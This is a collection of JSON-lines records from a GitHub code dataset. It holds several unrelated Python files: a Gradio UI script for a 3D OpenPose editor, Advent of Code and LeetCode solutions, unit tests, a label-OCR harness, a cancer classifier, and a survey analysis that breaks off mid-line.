depth_download = gr.Button(value=\"Download\")\n with gr.Column(variant=\"panel\"):\n normal_image = gr.Image(\n label=\"Normal\",\n elem_id=\"openpose3d_normal_image\",\n )\n with gr.Row():\n normal_target = gr.Dropdown(\n label=\"Control Model number\",\n choices=cn_dropdown_list,\n value=\"2\" if cn_max >= 3 else \"-\",\n )\n normal_download = gr.Button(value=\"Download\")\n with gr.Column(variant=\"panel\"):\n canny_image = gr.Image(\n label=\"Canny\",\n elem_id=\"openpose3d_canny_image\",\n )\n with gr.Row():\n canny_target = gr.Dropdown(\n label=\"Control Model number\",\n choices=cn_dropdown_list,\n value=\"3\" if cn_max >= 4 else \"-\",\n )\n canny_download = gr.Button(value=\"Download\")\n\n send_cn_inputs = [\n pose_image,\n pose_target,\n depth_image,\n depth_target,\n normal_image,\n normal_target,\n canny_image,\n canny_target,\n ]\n send_t2i.click(\n None,\n send_cn_inputs,\n None,\n _js=\"window.openpose3d.sendTxt2img\",\n )\n send_i2i.click(\n None,\n send_cn_inputs,\n None,\n _js=\"window.openpose3d.sendImg2img\",\n )\n pose_download.click(\n None,\n pose_image,\n None,\n _js=\"(v) => window.openpose3d.downloadImage(v, 'pose')\",\n )\n depth_download.click(\n None,\n depth_image,\n None,\n _js=\"(v) => window.openpose3d.downloadImage(v, 'depth')\",\n )\n normal_download.click(\n None,\n normal_image,\n None,\n _js=\"(v) => window.openpose3d.downloadImage(v, 'normal')\",\n )\n canny_download.click(\n None,\n canny_image,\n None,\n _js=\"(v) => window.openpose3d.downloadImage(v, 'canny')\",\n )\n\n\ndef on_ui_settings():\n \"\"\"WebUI callback: Create setting tab\"\"\"\n from modules.shared import OptionInfo, opts\n\n section = (\"openpose3d\", \"3D Openpose Editor\")\n\n opts.add_option(\n \"openpose3d_use_online_version\",\n OptionInfo(False, \"Use online version\", section=section),\n )\n\n\ndef main():\n \"\"\"Main function called when this script is run standalone.\"\"\"\n js_path = root_path / \"javascript\" / \"index.js\"\n css_path = root_path / \"style.css\"\n\n # JavaScript functions to simulate WebUI\n head = \"\"\"\n \n \"\"\"\n head += f\"\"\"\n \n \"\"\"\n\n # Simulate CSS loading of the WebUI\n original_template_response = gr.routes.templates.TemplateResponse\n\n def template_response(*args, **kwargs):\n res = original_template_response(*args, **kwargs)\n res.body = res.body.replace(b\"\", f\"{head}\".encode(\"utf8\"))\n res.init_headers()\n return res\n\n gr.routes.templates.TemplateResponse = template_response\n\n # Create tab\n with gr.Blocks(analytics_enabled=False, css=css_path.read_text()) as blocks:\n with gr.Tab(label=\"3D Openpose\", elem_id=\"tab_threedopenpose\"):\n create_ui()\n blocks.launch()\n\n\ntry:\n # Register callbacks when called from the WebUI\n from modules import script_callbacks\n\n script_callbacks.on_ui_tabs(on_ui_tabs)\n script_callbacks.on_ui_settings(on_ui_settings)\nexcept ImportError:\n # Call the main function when this script is run standalone\n main()\n","repo_name":"ZhUyU1997/open-pose-editor","sub_path":"scripts/openpose_editor_3d.py","file_name":"openpose_editor_3d.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","stars":592,"dataset":"github-code","pt":"40"} +{"seq_id":"42840308769","text":"from pprint import pprint\nfrom typing import Tuple, Set\n\n# input = \"\"\"R 4\n# U 4\n# L 3\n# D 1\n# R 4\n# D 1\n# L 5\n# R 2\n# \"\"\"\n\n# input = \"\"\"R 5\n# U 8\n# L 8\n# D 3\n# R 17\n# D 10\n# L 25\n# U 20\n# \"\"\"\n#\nwith open(\"input9.txt\", \"r\") as fp:\n input = fp.read()\n\nrope = [(0, 0)] * 10\ntail_positions: Set[Tuple[int, int]] = {rope[-1]}\n\n\ndef update_tail(head: Tuple[int, int], tail: Tuple[int, int]) -> Tuple[int, int]:\n diff = (head[0] - tail[0], head[1] - tail[1])\n if -1 <= diff[0] <= 1 and -1 <= diff[1] <= 1:\n return tail\n if diff == (2, 0):\n return tail[0] + 1, tail[1]\n if diff == (-2, 0):\n return tail[0] - 1, tail[1]\n if diff == (0, 2):\n return tail[0], tail[1] + 1\n if diff == (0, -2):\n return tail[0], tail[1] - 1\n if diff in [(2, 1), (1, 2), (2, 2)]:\n return tail[0] + 1, tail[1] + 1\n if diff in [(2, -1), (1, -2), (2, -2)]:\n return tail[0] + 1, tail[1] - 1\n if diff in [(-2, -1), (-1, -2), (-2, -2)]:\n return tail[0] - 1, tail[1] - 1\n if diff in [(-2, 1), (-1, 2), (-2, 2)]:\n return tail[0] - 1, tail[1] + 1\n raise Exception(\"missing case {}\".format(diff))\n\n\nfor line in input.split('\\n'):\n if line.strip() == \"\":\n continue\n # normal grid - R increases x, U increases y etc.\n direction, steps = line.strip().split(' ')\n steps = int(steps)\n print(direction, steps)\n if direction == 'R':\n for _ in range(steps):\n rope[0] = (rope[0][0] + 1, rope[0][1])\n for i in range(1, len(rope)):\n rope[i] = update_tail(rope[i-1], rope[i])\n tail_positions.add(rope[-1])\n if direction == 'L':\n for _ in range(steps):\n rope[0] = (rope[0][0] - 1, rope[0][1])\n for i in range(1, len(rope)):\n rope[i] = update_tail(rope[i-1], rope[i])\n tail_positions.add(rope[-1])\n if direction == 'U':\n for _ in range(steps):\n rope[0] = (rope[0][0], rope[0][1] + 1)\n for i in range(1, len(rope)):\n rope[i] = update_tail(rope[i-1], rope[i])\n tail_positions.add(rope[-1])\n if direction == 'D':\n for _ in range(steps):\n rope[0] = (rope[0][0], rope[0][1] - 1)\n for i in range(1, len(rope)):\n rope[i] = update_tail(rope[i-1], rope[i])\n tail_positions.add(rope[-1])\n\npprint(tail_positions)\nprint(len(tail_positions))","repo_name":"evsmithx/scratch_python","sub_path":"advent_of_code_2022/day9b.py","file_name":"day9b.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14076300257","text":"import unittest\nfrom unittest.mock import patch, mock_open\nfrom tiv_py.__main__ import main\nfrom tiv_py.Ansi import Ansi\n\nclass TestMainFunction(unittest.TestCase):\n\n @patch('tiv_py.__main__.parse_args')\n @patch('tiv_py.__main__.convert')\n def test_main_with_filename(self, mock_convert, mock_parse_args):\n mock_args = mock_parse_args.return_value\n mock_args.mode = \"24bit\"\n mock_args.max_width = 20\n mock_args.max_height = 10\n mock_args.stdin = False\n mock_args.html = False\n mock_args.grayscale = False\n mock_args.image_source = \"image.png\"\n \n main()\n \n mock_convert.assert_called_once_with(\n \"image.png\", 80, 80, Ansi.MODE_24BIT, False, False\n )\n\n@patch('tiv_py.parse_args')\n@patch('sys.stdin', new_callable=mock_open, read_data=\"image.png\\n\\n\")\n@patch('tiv_py.__main__.convert')\ndef test_main_with_stdin(self, mock_convert, mock_stdin, mock_parse_args):\n mock_args = mock_parse_args.return_value\n mock_args.mode = \"256\"\n mock_args.max_width = 20\n mock_args.max_height = 10\n mock_args.stdin = True\n mock_args.html = False\n mock_args.grayscale = False\n mock_args.image_source = None\n \n with self.assertRaises(SystemExit) as cm:\n main()\n self.assertEqual(cm.exception.code, 2)\n \n # If the above passes, meaning the SystemExit occurred with the expected code,\n # now ensure convert was called with the correct parameters. However, if the\n # SystemExit is expected due to incorrect arguments, the below assertion should\n # be removed and the cause of the SystemExit should be corrected instead.\n mock_convert.assert_called_once_with(\n \"image.png\", 80, 80, Ansi.MODE_256, False, False\n )\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"projhect/tiv.py","sub_path":"tiv_py/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31018199932","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 15:20 2016/10/15\n\nauthor songxf\n\"\"\"\n\nusf=input('Enter the US Floor:') #在Python3中input返回一个string,可使用int(some_string)将其转化成为一个整数\n\nusf=int(usf)\nwf=usf-1\nprint('Non-US Floor Number is',wf)\n\n\n\nmovies=list()\nmovie1=dict()\nmovie1['Director']='James Cameron'\nmovie1['Title']='Avatar'\nmovie1['Release date']='18 December 2009'\nmovie1['Running Time']='162 Minutes'\nmovie1['Rating']='PG-13'\nmovies.append(movie1)\n\nmovie2=dict()\nmovie2['Director']='David Fincher'\nmovie2['Title']='The Social Network'\nmovie2['Release date']='01 October 2010'\nmovie2['Running Time']='120 Minutes'\nmovie2['Rating']='PG-13'\nmovies.append(movie2)\n\nprint(movies)\n\n\nkeys=['Title','Director','Rating','Running Time']\nprint('-------------')\nprint(movies)\nprint('-------------')\nprint('keys')\n\nfor item in movies:\n\tprint('------------')\n\tfor key in keys:\n\t\tprint(key,':',item[key])\nprint('-------------')\n\n\nclass PartyAnimal: #定义一个类\n\tx=0\n\n\tdef party(self):\n\t\tself.x=self.x+1\n\t\tprint('So far',self.x)\nan=PartyAnimal() #使用定义的类来创建一个对象\nan.party()\nan.party()\nan.party()\n\nx=list()\ntype(x)\ndir(x)\n\n\ny='Hello there'\ndir(y)\n\nprint('Type:',type(an))\nprint('Dir:',dir(an))\n\nclass PartyAnimal:\n\tx=0\n\n\tdef __init__(self):\n\t\tprint('I am constructed')\n\n\tdef party(self):\n\t\tself.x=self.x+1\n\t\tprint('So far',self.x)\n\n\tdef __del__(self):\n\t\tprint('I am destructed',self.x)\n\nan=PartyAnimal()\nan.party()\nan.party()\nan.party()\n\n\nclass PartyAnimal:\n\tx=0\n\tname=\"\"\n\tdef __init__(self,z):\n\t\tself.name=z\n\t\tprint(self.name,'constructed')\n\n\tdef party(self):\n\t\tself.x=self.x+1\n\t\tprint(self.name,\"party count\",self.x)\n\ns=PartyAnimal(\"Sally\")\ns.party()\n\nj=PartyAnimal(\"Jim\")\nj.party()\ns.party()\n\nclass FootballFan(PartyAnimal):\n\tpoints=0\n\tdef touchdown(self):\n\t\tself.points=self.points+7\n\t\tself.party()\n\t\tprint(self.name,'points',self.points)\n\ns=PartyAnimal(\"Sally\")\ns.party()\n\nj=FootballFan(\"Jim\")\nj.party()\nj.touchdown()\n\n\n\n\n\n\n\n\n","repo_name":"lnsongxf/Python_for_everybody","sub_path":"Chapter13_Objects.py","file_name":"Chapter13_Objects.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43310337941","text":"from typing import List\n\n# Given an unsorted integer array nums, return the smallest missing \n# positive integer. You must implement an algorithm that runs in O(n) \n# time and uses constant extra space.\n#\n# Constraints:\n# - 1 <= nums.length <= 5 * 105\n# - -231 <= nums[i] <= 231 - 1\n\nclass Solution:\n def firstMissingPositive(self, nums: List[int]) -> int:\n pool = set(nums)\n max = len(nums) + 1\n for n in range(1, max):\n if n not in pool:\n return n\n return max\n\n\nget = Solution()\n#print(get.firstMissingPositive([3,4,-1,1]))\nprint(get.firstMissingPositive([1]))","repo_name":"Trequetrum/leetcode_practice","sub_path":"Python3/first_missing_positive3.py","file_name":"first_missing_positive3.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40192568607","text":"from contours import contour, draw_image\nfrom categories import (\n easy_labels, skewed_labels, lighting_labels, standard_labels,\n curved_labels, colored_labels, horizontal_labels)\nfrom text import apply_tesseract\nfrom post_process import post_process\nfrom keywords import Keywords\nimport cv2\nimport sys\nimport os\nimport jsonpickle\nfrom pprint import pprint\nfrom PIL import Image\nfrom timeit import default_timer as timer\nfrom subprocess import call\nfrom attrdict import AttrDict\n\n\ndef test_labels(dirpath, labels=None):\n \"\"\"\n Runs a complete label test on every .jpg in the specified directory.\n \"\"\"\n if labels is None:\n labels = easy_labels()\n ocr_results = []\n failed = []\n for label in labels:\n impath = os.path.join(dirpath, label.name + '.jpg')\n ret = test_label(impath, label)\n if ret:\n results, ocr_label = ret\n ocr_results.append((results, label))\n else:\n print(\"Label %s failed\" % label.name)\n failed.append(label)\n\n completed = [x for x in ocr_results if x]\n print('%d/%d labels processed to completion' % (\n len(completed), len(labels)))\n failed_str = ', '.join([l.name for l in failed])\n print('Failed labels: %s' % failed_str)\n\n total_correct = sum(len(x.correct) for x, y in completed)\n total = total_correct + sum(len(x.incorrect) for x, y in completed)\n print('%d/%d keywords correct for completed labels' % (\n total_correct, total))\n\n pct_rank = [(len(x.correct)/(len(x.incorrect) + len(x.correct)), y.name)\n for x, y in completed]\n pct_rank.sort(key=lambda tup: tup[0])\n\n pct_rank_str = ', '.join(\n ['%s: %.2f%%' % (x[1], 100*x[0]) for x in pct_rank])\n print('Labels %% correct: %s' % pct_rank_str)\n\n # Gather keyword accuracy data\n default_result = {'correct': 0, 'incorrect': 0}\n tuples = [(v, default_result.copy()) for v in Keywords.json.values()]\n keyword_results = AttrDict(dict(tuples))\n for k in Keywords.json:\n for result, label in ocr_results:\n if k in result.correct:\n keyword_results[k]['correct'] += 1\n else:\n keyword_results[k]['incorrect'] += 1\n print(\"Key: %s\\n%s\" % (k, keyword_results[k]))\n\n keywords_rank = []\n for k in Keywords.json:\n # Create accuracy ratings for each keywords\n correct = keyword_results[k]['correct']\n incorrect = keyword_results[k]['incorrect']\n accuracy = correct / (correct + incorrect)\n keywords_rank.append((k, accuracy))\n\n # Rank keywords by accuracy\n keywords_rank.sort(key=lambda tup: tup[1])\n\n pct_completed = len(completed)/len(labels)\n pct_accurate = total_correct/total\n return (pct_completed, pct_accurate, keywords_rank, pct_rank)\n\n\ndef test_categories(dirpath):\n std_ret = test_labels(dirpath, standard_labels())\n skew_ret = test_labels(dirpath, skewed_labels())\n light_ret = test_labels(dirpath, lighting_labels())\n curve_ret = test_labels(dirpath, curved_labels())\n horiz_ret = test_labels(dirpath, horizontal_labels())\n color_ret = test_labels(dirpath, colored_labels())\n\n def print_results(ret, label_type=''):\n ret_str = '%.2f%% completed, %.2f%% accurate' %\\\n (ret[0]*100, ret[1]*100)\n print('%s labels: %s' % (label_type, ret_str))\n\n print_results(std_ret, 'Standard')\n print_results(skew_ret, 'Skewed')\n print_results(light_ret, 'Lighting')\n print_results(curve_ret, 'Curved')\n print_results(horiz_ret, 'Horizontal')\n print_results(color_ret, 'Colored')\n\n\ndef test_label(impath, label=None, jsonpath=None, demo=False):\n \"\"\"\n Test for a label found in the given image, and compare with the\n second 'label' argument.\n If the jsonpath argument is provided, information\n from that file is used instead of the other specified arguments.\n \"\"\"\n if jsonpath is not None:\n json_file = open(jsonpath)\n label = jsonpickle.decode(json_file.read())\n\n if label is not None:\n print('Label %s' % label.name)\n ocr_label = end_to_end(impath, show=False, demo=demo)\n if ocr_label is False:\n print('Label Error')\n return False\n\n print(ocr_label)\n print('')\n # Compare this label with the JSON label object\n if label is not None and ocr_label is not None:\n results = AttrDict({'correct': [], 'incorrect': []})\n for k in Keywords.json.values():\n if label[k] == ocr_label[k]:\n results.correct.append(k)\n else:\n results.incorrect.append(k)\n\n return (results, ocr_label)\n\n return ocr_label\n\n\ndef demo_label(impath, jsonpath='../db/demo.json',\n backup_path='./demo/demo_2.jpg'):\n\n # Check to make sure it worked the first time\n correct, count, label = test_label(impath, jsonpath=jsonpath, demo=True)\n\n # If failed, move to backup image\n if correct < count:\n impath = backup_path\n\n # Actually demo now\n correct, count, label = test_label(impath, jsonpath=jsonpath, demo=True)\n\n image_order = [\"original\", \"gray\", \"blur\", \"hist\", \"thresholdm\",\n \"thresholdg\", \"contour\", \"final\"]\n image_paths = []\n basename = os.path.basename(impath)\n demo_dir = 'demo'\n for i, im_prefix in enumerate(image_order):\n prev_name = os.path.join(demo_dir, im_prefix + basename)\n new_name = os.path.join(demo_dir, str(i) + im_prefix + basename)\n os.rename(prev_name, new_name)\n image_paths.append(new_name)\n\n base = os.path.splitext(basename)[0]\n text_filenames = [\"tess_\" + base + \".txt\", \"result_\" + base + \".js\"]\n text_filepaths = [os.path.join(demo_dir, x) for x in text_filenames]\n\n # Write label object to text file\n with open(text_filepaths[-1], 'w') as result_file:\n pprint(label.__dict__, stream=result_file)\n\n call(['xdg-open', image_paths[0]])\n call(['xdg-open', text_filepaths[0]])\n call(['xdg-open', text_filepaths[1]])\n\n\ndef end_to_end(impath, show=False, demo=False):\n \"\"\"\n Return a Label object from a label in the provided image.\n \"\"\"\n\n start = timer()\n# try:\n img = Image.open(impath)\n exif_data = img._getexif()\n\n orientation = 1\n if exif_data is not None:\n # orientation tag is 0x0112\n o_data = exif_data[274]\n if o_data is not None:\n orientation = int(o_data)\n\n label_im = contour(impath, demo=demo, orientation=orientation)\n if label_im is False:\n label_im = contour(impath, invert=True, demo=demo)\n if label_im is False:\n return False\n\n end = timer()\n print('Pre process time: %2f' % (end-start))\n\n basename = os.path.basename(impath)\n label_impath = impath.replace(basename, 'tmp_' + basename)\n # label_impath = impath.lower().replace('.jpg', 'label_tmp.jpg')\n cv2.imwrite(label_impath, label_im)\n\n start = timer()\n # Apply Tesseract to image\n output = apply_tesseract(label_impath, demo=demo)\n\n end = timer()\n print('OCR time: %2f' % (end-start))\n os.remove(label_impath)\n\n start = timer()\n ocr_label = post_process(output, demo=demo)\n\n end = timer()\n print('Post process time: %2f' % (end-start))\n\n if show:\n draw_image(label_im, 'Transformed label: %s' % impath)\n\n return ocr_label\n\n\ndef main():\n pass\n\n# Run when called from command line, not import.\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n arg = sys.argv[1]\n if arg == 'demo':\n demo_label(sys.argv[2])\n elif arg == 'categories':\n test_categories(sys.argv[2])\n elif os.path.isdir(arg):\n test_labels(arg)\n elif os.path.isfile(arg):\n json_path = None\n if len(sys.argv) > 2:\n json_path = '../db/' + sys.argv[2] + '.json'\n ret = test_label(arg, jsonpath=json_path)\n if ret is not None:\n if len(ret) == 1:\n label = ret\n else:\n res, label = ret\n print('%d/%d Correct' % (len(res.correct),\n (len(res.correct) +\n len(res.incorrect))))\n else:\n print('Usage:\\n\\t\\'python3 end_to_end.py \\'\\n\\\n (path should be a file or directory).')\n","repo_name":"rsullivan00/labelRecognizer","sub_path":"python/end_to_end.py","file_name":"end_to_end.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"28102030202","text":"import cv as cv\r\nimport cv2\r\nfrom PIL import Image\r\nfrom PIL.ImageColor import colormap\r\nfrom matplotlib.pyplot import figure, subplot, gray, title\r\nfrom numpy import *\r\nimport numpy as np\r\nfrom numpy.distutils.from_template import conv\r\nfrom scipy import ndimage\r\nfrom scipy.ndimage import filters\r\nfrom scipy.signal import convolve2d\r\nfrom skimage.io import imread,imsave,imshow\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef gauss_1(sigma_d):\r\n #result=cv2.GaussianBlur(image,(999,999),sigma_d)\r\n #return result\r\n kernel_size = 2 * 3 * sigma_d + 1\r\n kernel = np.zeros((int(kernel_size), int(kernel_size)))\r\n center = kernel_size // 2\r\n s = sigma_d ** 2\r\n #sum_val = 0\r\n for i in range(int(kernel_size)):\r\n for j in range(int(kernel_size)):\r\n x, y = i - center, j - center\r\n kernel[i, j] = (-x/s)*np.exp(-(x ** 2 + y ** 2) / (2 * s))\r\n # print(i,j,kernel[i,j])\r\n #kernel = kernel / (2 * np.pi * s)\r\n return kernel\r\n\r\ndef gauss_2(sigma_d):\r\n #result=cv2.GaussianBlur(image,(999,999),sigma_d)\r\n #return result\r\n kernel_size = 2 * 3 * sigma_d + 1\r\n kernel = np.zeros((int(kernel_size), int(kernel_size)))\r\n center = kernel_size // 2\r\n s = sigma_d ** 2\r\n #sum_val = 0\r\n for i in range(int(kernel_size)):\r\n for j in range(int(kernel_size)):\r\n x, y = i - center, j - center\r\n kernel[i, j] = (-y/s)*np.exp(-(x ** 2 + y ** 2) / (2 * s))\r\n # print(i,j,kernel[i,j])\r\n #kernel = kernel / (2 * np.pi * s)\r\n return kernel\r\n\r\nG = imread(\"in.bmp\")\r\ngraph = np.array(G,dtype='float')\r\n #kernel = gauss_1(float(sys.argv[2]))\r\n #im = ndimage.convolve(graph[:,:,0], kernel)\r\nkernel1=gauss_1(4)\r\nkernel2=gauss_2(4)\r\nim1=ndimage.convolve(graph[:, :, 0], kernel1)\r\nim2=ndimage.convolve(graph[:, :, 0], kernel2)\r\nim=sqrt(im1*im1+im2*im2)\r\n#im=abs(im1)+abs(im2)\r\ngmax=np.max(im)\r\nfor i in range(int(G.shape[0])):\r\n for j in range(int(G.shape[1])):\r\n if(im[i,j]==gmax):\r\n im[i,j]=255\r\n else:\r\n im[i,j]=im[i,j]*255/gmax\r\nprint(im)\r\nIMAGE = np.array(im, dtype='uint8')\r\nimsave(\"new1.bmp\", IMAGE)\r\n","repo_name":"helexin2022/test","sub_path":"3_helexin/grad2.py","file_name":"grad2.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22995183408","text":"import pandas as pd\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\n\n# Load the data\nDATA_PATH = \"cancer.csv\"\ndf = pd.read_csv(DATA_PATH)\n\n# Preprocess the data\nle = LabelEncoder()\ndf['diagnosis'] = le.fit_transform(df['diagnosis']) # Convert diagnosis M/B to 1/0\n\n# Select the features and the target\nX = df[[\"radius_mean\", \"area_mean\", \"perimeter_mean\", \"concavity_mean\", \"concave points_mean\"]]\ny = df['diagnosis']\n\n# Split the data into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n# Define and train the model\nmodel = RandomForestClassifier()\nmodel.fit(X_train, y_train)\n\n# Save the trained model to a file\npickle.dump(model, open(\"cancer.pkl\", 'wb'))\n\n# Load the model from the file\nmodel = pickle.load(open(\"cancer.pkl\", 'rb'))\n\n# Predict the values for the testing set\ny_pred = model.predict(X_test)\n\n# Calculate and print the accuracy\naccuracy = accuracy_score(y_test, y_pred)\nprint(f\"Model Accuracy: {accuracy}\")\n\n# Get user input for new data\nradius_mean = float(input(\"Enter the Mean of the Radius: \"))\narea_mean = float(input(\"Enter the Mean of the Area: \"))\nperimeter_mean = float(input(\"Enter the Mean of the Perimeter: \"))\nconcavity_mean = float(input(\"Enter the Mean of the Concavity: \"))\nconcave_points_mean = float(input(\"Enter the Mean of the Concave Points: \"))\n\nnew_data = [[radius_mean, area_mean, perimeter_mean, concavity_mean, concave_points_mean]] # Example data\nprediction = model.predict(new_data)\n\nif prediction[0] == 1:\n print(\"The cancer is malignant.\")\nelse:\n print(\"The cancer is benign.\")\n","repo_name":"adilsp5075/medH-fastapi","sub_path":"prediction/cancer.py","file_name":"cancer.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10786381685","text":"# Time: O(|E|)\n# Space: O(|E|)\n\nimport collections\nimport itertools\n\nclass Solution(object):\n def findAllRecipes(self, recipes, ingredients, supplies):\n \"\"\"\n :type recipes: List[str]\n :type ingredients: List[List[str]]\n :type supplies: List[str]\n :rtype: List[str]\n \"\"\"\n indegree = collections.defaultdict(int)\n adj = collections.defaultdict(list)\n for r, ingredient in itertools.izip(recipes, ingredients): \n indegree[r] = len(ingredient)\n for ing in ingredient:\n adj[ing].append(r)\n result = []\n recipes = set(recipes)\n q = supplies\n while q: \n new_q = []\n for u in q:\n if u in recipes:\n result.append(u)\n for v in adj[u]:\n indegree[v] -= 1\n if not indegree[v]:\n new_q.append(v)\n q = new_q\n return result \n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/find-all-possible-recipes-from-given-supplies.py","file_name":"find-all-possible-recipes-from-given-supplies.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"15599413231","text":"import pytest\n\nfrom changelog_gen import errors\nfrom changelog_gen.cli.command import SUPPORTED_SECTIONS\nfrom changelog_gen.extractor import ReleaseNoteExtractor\n\n\n@pytest.fixture()\ndef release_notes(cwd):\n r = cwd / \"release_notes\"\n r.mkdir()\n f = r / \".file\"\n f.write_text(\"\")\n return r\n\n\n@pytest.fixture()\ndef _valid_release_notes(release_notes):\n for i, note in enumerate([\"1.fix\", \"2.feat\", \"3.feat\", \"4.fix\"], 1):\n n = release_notes / note\n n.write_text(f\"Detail about {i}\")\n\n\n@pytest.fixture()\ndef _breaking_release_notes(release_notes):\n for i, note in enumerate([\"1.fix!\", \"2.feat\", \"3.feat!\", \"4.fix\"], 1):\n n = release_notes / note\n n.write_text(f\"Detail about {i}\")\n\n\n@pytest.fixture()\ndef _invalid_release_notes(release_notes):\n for i, note in enumerate([\"1.fix\", \"2.feat\", \"3.bug\", \"4.fix\"], 1):\n n = release_notes / note\n n.write_text(f\"Detail about {i}\")\n\n\n@pytest.fixture()\ndef _remap_release_notes(release_notes):\n for i, note in enumerate([\"1.bugfix\", \"2.feature\", \"3.test\"]):\n n = release_notes / note\n n.write_text(f\"Detail about {i}\")\n\n\n@pytest.mark.usefixtures(\"cwd\")\ndef test_init_with_no_release_notes_raises():\n with pytest.raises(errors.NoReleaseNotesError):\n ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n\ndef test_init_with_release_notes_non_dir_raises(cwd):\n r = cwd / \"release_notes\"\n r.write_text(\"not a dir\")\n\n with pytest.raises(errors.NoReleaseNotesError):\n ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n\n@pytest.mark.usefixtures(\"_valid_release_notes\")\ndef test_valid_notes_extraction():\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n sections = e.extract()\n\n assert sections == {\n \"feat\": {\n \"2\": {\"description\": \"Detail about 2\", \"breaking\": False},\n \"3\": {\"description\": \"Detail about 3\", \"breaking\": False},\n },\n \"fix\": {\n \"1\": {\"description\": \"Detail about 1\", \"breaking\": False},\n \"4\": {\"description\": \"Detail about 4\", \"breaking\": False},\n },\n }\n\n\n@pytest.mark.usefixtures(\"_breaking_release_notes\")\ndef test_breaking_notes_extraction():\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n sections = e.extract()\n\n assert sections == {\n \"feat\": {\n \"2\": {\"description\": \"Detail about 2\", \"breaking\": False},\n \"3\": {\"description\": \"Detail about 3\", \"breaking\": True},\n },\n \"fix\": {\n \"1\": {\"description\": \"Detail about 1\", \"breaking\": True},\n \"4\": {\"description\": \"Detail about 4\", \"breaking\": False},\n },\n }\n\n\n@pytest.mark.usefixtures(\"_invalid_release_notes\")\ndef test_invalid_notes_extraction_raises():\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n with pytest.raises(errors.InvalidSectionError):\n e.extract()\n\n\n@pytest.mark.usefixtures(\"_invalid_release_notes\")\ndef test_section_remapping_can_remap_custom_sections():\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n sections = e.extract({\"bug\": \"fix\"})\n assert sections == {\n \"feat\": {\n \"2\": {\"description\": \"Detail about 2\", \"breaking\": False},\n },\n \"fix\": {\n \"1\": {\"description\": \"Detail about 1\", \"breaking\": False},\n \"3\": {\"description\": \"Detail about 3\", \"breaking\": False},\n \"4\": {\"description\": \"Detail about 4\", \"breaking\": False},\n },\n }\n\n\n@pytest.mark.usefixtures(\"_invalid_release_notes\")\ndef test_section_mapping_can_handle_new_sections():\n e = ReleaseNoteExtractor({\"bug\": \"BugFix\", \"feat\": \"Features\"})\n\n sections = e.extract({\"fix\": \"bug\"})\n assert sections == {\n \"feat\": {\n \"2\": {\"description\": \"Detail about 2\", \"breaking\": False},\n },\n \"bug\": {\n \"1\": {\"description\": \"Detail about 1\", \"breaking\": False},\n \"3\": {\"description\": \"Detail about 3\", \"breaking\": False},\n \"4\": {\"description\": \"Detail about 4\", \"breaking\": False},\n },\n }\n\n\n@pytest.mark.usefixtures(\"_valid_release_notes\")\ndef test_dry_run_clean_keeps_files(release_notes):\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS, dry_run=True)\n\n e.clean()\n\n assert sorted([f.name for f in release_notes.iterdir()]) == sorted(\n [\n \"1.fix\",\n \"2.feat\",\n \"3.feat\",\n \"4.fix\",\n \".file\",\n ],\n )\n\n\n@pytest.mark.usefixtures(\"_valid_release_notes\")\ndef test_clean_removes_all_non_dotfiles(release_notes):\n \"\"\"Clean should not remove .gitkeep files etc.\"\"\"\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n e.clean()\n\n assert [f.name for f in release_notes.iterdir()] == [\".file\"]\n","repo_name":"EdgyEdgemond/changelog-gen","sub_path":"tests/test_extractor.py","file_name":"test_extractor.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"7354560386","text":"import pandas as pd\nimport matplotlib.pyplot as m\nimport scipy.stats as sp\nimport seaborn as s\n\ndf = pd.read_csv(\"INFI\\Aufgabe5\\data\\ESS8e02.1_F1.csv\", sep=\",\")\ndf[\"gndr\"] = pd.cut(df[\"gndr\"], [0,1,2,9], labels=[\"Male\", \"Female\", \"Unspecified\"])\ngender = df[\"gndr\"]\n\n#1.3 a\ntrustPolice = df[\"trstplc\"]\ntrustPoliceGender = pd.crosstab(trustPolice, gender, normalize=\"index\")\ntrustPoliceGender.plot.bar()\nm.show()\n\nchi, p, dof, expected = sp.chi2_contingency(trustPoliceGender)\nprint(chi, \"\\n\", p, \"\\n\", dof, \"\\n\", expected)\n\ns.heatmap(trustPoliceGender, annot=False, cmap=\"YlGnBu\")\ns.heatmap(trustPoliceGender, 